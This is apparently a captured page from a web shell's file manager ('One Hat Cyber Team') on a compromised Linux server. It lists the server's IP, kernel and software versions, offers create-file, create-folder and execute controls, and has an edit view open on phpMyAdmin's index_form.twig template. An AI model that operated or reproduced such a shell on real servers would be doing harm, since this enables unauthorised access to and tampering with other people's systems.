⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.91
Server IP:
157.245.101.34
Server:
Linux skvinfotech-website 5.4.0-131-generic #147-Ubuntu SMP Fri Oct 14 17:07:22 UTC 2022 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
phpmyadmin
/
templates
/
table
/
Edit File: index_form.twig
{{ Url_getHiddenInputs(form_params) }}
{% trans 'Index name:' %} {{ Util_showHint('"PRIMARY"
must
be the name of and
only of
a primary key!'|trans) }}
{% trans 'Index choice:' %} {{ Util_showMySQLDocu('ALTER_TABLE') }}
{{ index.generateIndexChoiceSelector(create_edit_table)|raw }}
{{ Util_getDivForSliderEffect('indexoptions', 'Advanced Options'|trans) }}
{% trans 'Key block size:' %}
{% trans 'Index type:' %} {{ Util_showMySQLDocu('ALTER_TABLE') }}
{{ index.generateIndexTypeSelector()|raw }}
{% trans 'Parser:' %}
{% trans 'Comment:' %}
{% trans 'Column' %}
{% trans 'Size' %}
{% set spatial_types = [ 'geometry', 'point', 'linestring', 'polygon', 'multipoint', 'multilinestring', 'multipolygon', 'geomtrycollection' ] %}
{% for column in index.getColumns() %}
-- {% trans 'Ignore' %} --
{% for field_name, field_type in fields %} {% if (index.getChoice() != 'FULLTEXT' or field_type matches '/(char|text)/i') and (index.getChoice() != 'SPATIAL' or field_type in spatial_types) %}
{{ field_name }} [{{ field_type }}]
{% endif %} {% endfor %}
{% endfor %} {% if add_fields > 0 %} {% for i in range(1, add_fields) %}
-- {% trans 'Ignore' %} --
{% set j = 0 %} {% for field_name, field_type in fields %} {% if create_edit_table %} {% set col_index = field_type[1] %} {% set field_type = field_type[0] %} {% endif %} {% set j = j + 1 %}
{{ field_name }} [{{ field_type }}]
{% endfor %}
{% endfor %} {% endif %}
{% trans 'Preview SQL' %}
Simpan